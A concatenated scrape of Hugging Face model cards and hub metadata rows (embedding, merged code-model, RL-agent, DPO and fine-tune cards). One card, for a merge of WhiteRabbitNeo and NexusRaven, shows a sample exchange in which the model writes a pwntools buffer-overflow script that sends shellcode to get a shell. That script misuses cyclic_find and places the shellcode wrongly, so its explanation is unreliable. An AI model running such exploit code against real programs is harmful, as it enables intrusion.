Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
#Mean Pooling - Take attention mask into account for correct averaging
def mean_pooling(model_output, attention_mask):
token_embeddings = model_output[0] #First element of model_output contains all token embeddings
input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('{MODEL_NAME}')
model = AutoModel.from_pretrained('{MODEL_NAME}')
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, mean pooling.
sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Evaluation Results
<!--- Describe how your model was evaluated -->
For an automated evaluation of this model, see the *Sentence Embeddings Benchmark*: [https://seb.sbert.net](https://seb.sbert.net?model_name={MODEL_NAME})
## Training
The model was trained with the parameters:
**DataLoader**:
`torch.utils.data.dataloader.DataLoader` of length 7975 with parameters:
```
{'batch_size': 10, 'sampler': 'torch.utils.data.sampler.RandomSampler', 'batch_sampler': 'torch.utils.data.sampler.BatchSampler'}
```
**Loss**:
`sentence_transformers.losses.TripletLoss.TripletLoss` with parameters:
```
{'distance_metric': 'TripletDistanceMetric.EUCLIDEAN', 'triplet_margin': 0.4}
```
Parameters of the fit()-Method:
```
{
"epochs": 3,
"evaluation_steps": 0,
"evaluator": "NoneType",
"max_grad_norm": 1,
"optimizer_class": "<class 'torch.optim.adamw.AdamW'>",
"optimizer_params": {
"lr": 2e-05
},
"scheduler": "WarmupLinear",
"steps_per_epoch": null,
"warmup_steps": 2392,
"weight_decay": 0.01
}
```
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False})
)
```
## Citing & Authors
<!--- Describe where people can find more information --> |
lodrick-the-lafted/Winged-Lagomorph-2x13B | lodrick-the-lafted | 2024-01-22T00:11:20Z | 19 | 3 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"moe",
"merge",
"custom_code",
"base_model:codellama/CodeLlama-13b-Instruct-hf",
"base_model:finetune:codellama/CodeLlama-13b-Instruct-hf",
"license:llama2",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-16T21:43:46Z | ---
license: llama2
tags:
- moe
- merge
base_model: codellama/CodeLlama-13b-Instruct-hf
model-index:
- name: Winged-Lagomorph-2x13B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: AI2 Reasoning Challenge (25-Shot)
type: ai2_arc
config: ARC-Challenge
split: test
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 47.95
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: HellaSwag (10-Shot)
type: hellaswag
split: validation
args:
num_few_shot: 10
metrics:
- type: acc_norm
value: 69.39
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU (5-Shot)
type: cais/mmlu
config: all
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 44.5
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: TruthfulQA (0-shot)
type: truthful_qa
config: multiple_choice
split: validation
args:
num_few_shot: 0
metrics:
- type: mc2
value: 44.54
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-shot)
type: winogrande
config: winogrande_xl
split: validation
args:
num_few_shot: 5
metrics:
- type: acc
value: 67.4
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GSM8k (5-shot)
type: gsm8k
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 25.63
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
---
Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo template for regular code, and the NR template for function calling.
<img src=https://huggingface.co/lodrick-the-lafted/Winged-Lagomorph-2x13B/resolve/main/winged-lago.png>
SYSTEM: Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
USER: Write a pwntools script that overflows a 64 character buffer from stdin.
ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps:
1. **Identify the vulnerable program**: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`.
2. **Set up the environment**: Install pwntools and any other necessary dependencies.
3. **Create a pwntools script**: Start by importing the `pwn` module and setting up the connection to the vulnerable program.
4. **Find the offset**: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset.
5. **Overflow the buffer**: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack.
6. **Control the execution flow**: Overwrite the return address with the address of a shellcode or a function that will give us a shell.
7. **Execute the script**: Run the script and observe the results.
Here's an example pwntools script that overflows a 64-character buffer:
```python
from pwn import *
# Set up the connection to the vulnerable program
p = process('./vulnerable_program')
# Find the offset using cyclic
offset = cyclic_find(b'A'*64)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Overflow the buffer
payload = b'A' * offset + shellcode
p.sendline(payload)
# Execute the script
p.interactive()
```
In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs.
Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with.
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_lodrick-the-lafted__Winged-Lagomorph-2x13B)
| Metric |Value|
|---------------------------------|----:|
|Avg. |49.90|
|AI2 Reasoning Challenge (25-Shot)|47.95|
|HellaSwag (10-Shot) |69.39|
|MMLU (5-Shot) |44.50|
|TruthfulQA (0-shot) |44.54|
|Winogrande (5-shot) |67.40|
|GSM8k (5-shot) |25.63|
|
Marcus2112/ppo-SnowballTarget | Marcus2112 | 2024-01-22T00:09:47Z | 8 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"SnowballTarget",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SnowballTarget",
"region:us"
] | reinforcement-learning | 2024-01-22T00:09:42Z | ---
library_name: ml-agents
tags:
- SnowballTarget
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SnowballTarget
---
# **ppo** Agent playing **SnowballTarget**
This is a trained model of a **ppo** agent playing **SnowballTarget**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: koppelmann/ppo-SnowballTarget
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
moreh/MoMo-72B-lora-1.8.6-DPO | moreh | 2024-01-22T00:09:36Z | 164 | 32 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"en",
"arxiv:2305.18290",
"arxiv:2106.09685",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-16T02:11:50Z | ---
license: mit
language:
- en
---
# **Introduction**
MoMo-72B-lora-1.8.6-DPO is trained via Direct Preference Optimization([DPO](https://arxiv.org/abs/2305.18290)) from [MoMo-72B-LoRA-V1.4](https://huggingface.co/moreh/MoMo-72B-LoRA-V1.4) as its base model, with several optimizations in hyperparameters.
[MoMo-72B-LoRA-V1.4](https://huggingface.co/moreh/MoMo-72B-LoRA-V1.4) is trained via Supervised Fine-Tuning (SFT) using [LoRA](https://arxiv.org/abs/2106.09685), with the QWEN-72B model as its base-model.
Note that we did not exploit any form of weight merge.
For leaderboard submission, the trained weight is realigned for compatibility with llama.
MoMo-72B is trained using **[Moreh](https://moreh.io/)**'s [MoAI platform](https://moreh.io/product), which simplifies the training of large-scale models, and AMD's MI250 GPU.
## Details
### Used Librarys
- torch
- peft
### Used Datasets
- [slimorca](Open-Orca/SlimOrca)
- [truthy](https://huggingface.co/datasets/jondurbin/truthy-dpo-v0.1)
- [orca_dpo_pairs](https://huggingface.co/datasets/Intel/orca_dpo_pairs)
- No other dataset was used
- No benchmark test set or the training set are used
- [data contamination check](https://github.com/swj0419/detect-pretrain-code-contamination) result
| Model | ARC | MMLU | TruthfulQA | GSM8K |
|------------------------------|-------|-------|-------|-------|
| **V1.8.6(result < 0.1, %)**| TBU |TBU | 0.73 | TBU |
### Used Environments
- AMD MI250 & MoAI platform
- Please visit https://moreh.io/product for more information about MoAI platform
- Or, contact us directly [[email protected]](mailto:[email protected])
## How to use
```python
# pip install transformers==4.35.2
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("moreh/MoMo-72B-lora-1.8.6-DPO")
model = AutoModelForCausalLM.from_pretrained(
"moreh/MoMo-72B-lora-1.8.6-DPO"
)
``` |
moreh/MoMo-72B-lora-1.8.4-DPO | moreh | 2024-01-22T00:08:48Z | 164 | 11 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"en",
"arxiv:2305.18290",
"arxiv:2106.09685",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-12T02:36:09Z | ---
license: mit
language:
- en
---
# **Introduction**
MoMo-72B-lora-1.8.4-DPO is trained via Direct Preference Optimization([DPO](https://arxiv.org/abs/2305.18290)) from [MoMo-72B-LoRA-V1.4](https://huggingface.co/moreh/MoMo-72B-LoRA-V1.4) as its base model, with several optimizations in hyperparameters.
[MoMo-72B-LoRA-V1.4](https://huggingface.co/moreh/MoMo-72B-LoRA-V1.4) is trained via Supervised Fine-Tuning (SFT) using [LoRA](https://arxiv.org/abs/2106.09685), with the QWEN-72B model as its base-model.
Note that we did not exploit any form of weight merge.
For leaderboard submission, the trained weight is realigned for compatibility with llama.
MoMo-72B is trained using **[Moreh](https://moreh.io/)**'s [MoAI platform](https://moreh.io/product), which simplifies the training of large-scale models, and AMD's MI250 GPU.
## Details
### Used Librarys
- torch
- peft
### Used Datasets
- [slimorca](Open-Orca/SlimOrca)
- [truthy](https://huggingface.co/datasets/jondurbin/truthy-dpo-v0.1)
- [orca_dpo_pairs](https://huggingface.co/datasets/Intel/orca_dpo_pairs)
- No other dataset was used
- No benchmark test set or the training set are used
- [data contamination check](https://github.com/swj0419/detect-pretrain-code-contamination) result
| Model | ARC | MMLU | TruthfulQA | GSM8K |
|------------------------------|-------|-------|-------|-------|
| **V1.4(result < 0.1, %)**| TBU |TBU | TBU | TBU |
### Used Environments
- AMD MI250 & MoAI platform
- Please visit https://moreh.io/product for more information about MoAI platform
- Or, contact us directly [[email protected]](mailto:[email protected])
## How to use
```python
# pip install transformers==4.35.2
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("moreh/MoMo-72B-lora-1.8.4-DPO")
model = AutoModelForCausalLM.from_pretrained(
"moreh/MoMo-72B-lora-1.8.4-DPO"
)
``` |
Vasanth/Beast-Soul | Vasanth | 2024-01-22T00:02:12Z | 49 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"merge",
"mergekit",
"lazymergekit",
"base_model:decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP",
"base_model:merge:decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP",
"base_model:udkai/Turdus",
"base_model:merge:udkai/Turdus",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-21T23:51:49Z | ---
tags:
- merge
- mergekit
- lazymergekit
base_model:
- udkai/Turdus
- decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP
license: apache-2.0
---
# Beast-Soul
Beast-Soul is a merge of the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [udkai/Turdus](https://huggingface.co/udkai/Turdus)
* [decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP](https://huggingface.co/decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP)
## 🧩 Configuration
```yaml
slices:
- sources:
- model: udkai/Turdus
layer_range: [0, 32]
- model: decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP
layer_range: [0, 32]
merge_method: slerp
base_model: OpenPipe/mistral-ft-optimized-1218
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
```
## 💻 Usage
```python
!pip install -qU transformers accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "Vasanth/Beast-Soul"
messages = [{"role": "user", "content": "What is a large language model?"}]
tokenizer = AutoTokenizer.from_pretrained(model)
prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
pipeline = transformers.pipeline(
"text-generation",
model=model,
torch_dtype=torch.float16,
device_map="auto",
)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
``` |
sanalsprasad/train_debug | sanalsprasad | 2024-01-21T23:57:30Z | 6 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"roberta",
"text-classification",
"generated_from_trainer",
"base_model:openai-community/roberta-base-openai-detector",
"base_model:finetune:openai-community/roberta-base-openai-detector",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-11T00:51:24Z | ---
license: mit
base_model: openai-community/roberta-base-openai-detector
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: train_debug
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# train_debug
This model is a fine-tuned version of [openai-community/roberta-base-openai-detector](https://huggingface.co/openai-community/roberta-base-openai-detector) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0098
- Accuracy: 0.999
- Roc Auc: 1.0000
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | Roc Auc |
|:-------------:|:-----:|:-----:|:---------------:|:--------:|:-------:|
| 0.0336 | 1.0 | 6250 | 0.0298 | 0.992 | 0.9999 |
| 0.0085 | 2.0 | 12500 | 0.0098 | 0.999 | 1.0000 |
### Framework versions
- Transformers 4.36.0
- Pytorch 2.0.0
- Datasets 2.1.0
- Tokenizers 0.15.0
|
fionazhang/mistral-environment-data | fionazhang | 2024-01-21T23:55:53Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"trl",
"sft",
"generated_from_trainer",
"base_model:mistralai/Mistral-7B-v0.1",
"base_model:finetune:mistralai/Mistral-7B-v0.1",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-21T23:32:53Z | ---
license: apache-2.0
base_model: mistralai/Mistral-7B-v0.1
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: mistral-environment-data
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mistral-environment-data
This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: constant
- lr_scheduler_warmup_ratio: 0.03
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.0a0+git7bcf7da
- Datasets 2.16.1
- Tokenizers 0.15.0
|
CLMBR/binding-domain-lstm-3 | CLMBR | 2024-01-21T23:41:16Z | 1 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:41:43Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-domain-lstm-3
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-domain-lstm-3
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9699
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 3
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7862 | 0.03 | 76320 | 4.7490 |
| 4.5033 | 1.03 | 152640 | 4.4718 |
| 4.3621 | 0.03 | 228960 | 4.3375 |
| 4.2771 | 1.03 | 305280 | 4.2549 |
| 4.2156 | 0.03 | 381600 | 4.1983 |
| 4.1699 | 1.03 | 457920 | 4.1582 |
| 4.1302 | 0.03 | 534240 | 4.1273 |
| 4.0971 | 1.03 | 610560 | 4.1029 |
| 4.0699 | 0.03 | 686880 | 4.0839 |
| 4.0479 | 1.03 | 763200 | 4.0686 |
| 4.0271 | 0.03 | 839520 | 4.0558 |
| 4.011 | 0.03 | 915840 | 4.0446 |
| 3.9945 | 1.03 | 992160 | 4.0362 |
| 3.9758 | 0.03 | 1068480 | 4.0277 |
| 3.965 | 1.03 | 1144800 | 4.0209 |
| 3.9495 | 0.03 | 1221120 | 4.0152 |
| 3.9368 | 1.03 | 1297440 | 4.0103 |
| 3.9259 | 0.03 | 1373760 | 4.0055 |
| 3.9195 | 1.03 | 1450080 | 4.0012 |
| 3.9172 | 0.03 | 1526400 | 3.9978 |
| 3.9128 | 1.03 | 1602720 | 3.9946 |
| 3.9092 | 0.03 | 1679040 | 3.9919 |
| 3.9022 | 1.03 | 1755360 | 3.9895 |
| 3.8968 | 0.03 | 1831680 | 3.9873 |
| 3.8901 | 1.03 | 1908000 | 3.9852 |
| 3.8836 | 0.03 | 1984320 | 3.9835 |
| 3.8778 | 1.03 | 2060640 | 3.9819 |
| 3.876 | 0.03 | 2136960 | 3.9803 |
| 3.8693 | 1.03 | 2213280 | 3.9786 |
| 3.8607 | 0.03 | 2289600 | 3.9772 |
| 3.8579 | 1.03 | 2365920 | 3.9760 |
| 3.8521 | 0.03 | 2442240 | 3.9750 |
| 3.8445 | 1.03 | 2518560 | 3.9739 |
| 3.8406 | 0.03 | 2594880 | 3.9733 |
| 3.8394 | 1.03 | 2671200 | 3.9727 |
| 3.8421 | 0.03 | 2747520 | 3.9718 |
| 3.8447 | 1.03 | 2823840 | 3.9712 |
| 3.8463 | 0.03 | 2900160 | 3.9707 |
| 3.8447 | 1.03 | 2976480 | 3.9702 |
| 3.8428 | 0.02 | 3052726 | 3.9699 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
clinicalnlplab/finetuned-PMCLLaMA-13b-LitCovid | clinicalnlplab | 2024-01-21T23:33:28Z | 0 | 0 | peft | [
"peft",
"safetensors",
"llama",
"region:us"
] | null | 2024-01-21T03:03:47Z | ---
library_name: peft
---
## Training procedure
### Framework versions
- PEFT 0.6.0.dev0
|
bearbearyu1223/whisper-large-peft-lora-zh_TW-v0.1 | bearbearyu1223 | 2024-01-21T23:31:56Z | 0 | 0 | null | [
"safetensors",
"generated_from_trainer",
"base_model:openai/whisper-large-v2",
"base_model:finetune:openai/whisper-large-v2",
"license:apache-2.0",
"region:us"
] | null | 2024-01-21T17:57:45Z | ---
license: apache-2.0
base_model: openai/whisper-large-v2
tags:
- generated_from_trainer
metrics:
- wer
model-index:
- name: whisper-large-peft-lora-zh_TW-v0.1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# whisper-large-peft-lora-zh_TW-v0.1
This model is a fine-tuned version of [openai/whisper-large-v2](https://huggingface.co/openai/whisper-large-v2) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.1381
- Wer: 0.7855
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.001
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 50
- num_epochs: 4
### Training results
| Training Loss | Epoch | Step | Validation Loss | Wer |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| 0.2471 | 1.0 | 886 | 0.1639 | 0.5176 |
| 0.1509 | 2.0 | 1772 | 0.1500 | 0.5237 |
| 0.0374 | 3.0 | 2658 | 0.1417 | 0.8449 |
| 0.0057 | 4.0 | 3544 | 0.1381 | 0.7855 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
ddh0/openchat-3.5-0106-GGUF-fp16 | ddh0 | 2024-01-21T23:06:53Z | 0 | 1 | null | [
"gguf",
"text-generation",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | text-generation | 2024-01-21T22:23:24Z | ---
license: apache-2.0
pipeline_tag: text-generation
---
FP16 GGUF of [openchat/openchat-3.5-0106](https://huggingface.co/openchat/openchat-3.5-0106). |
Subsets and Splits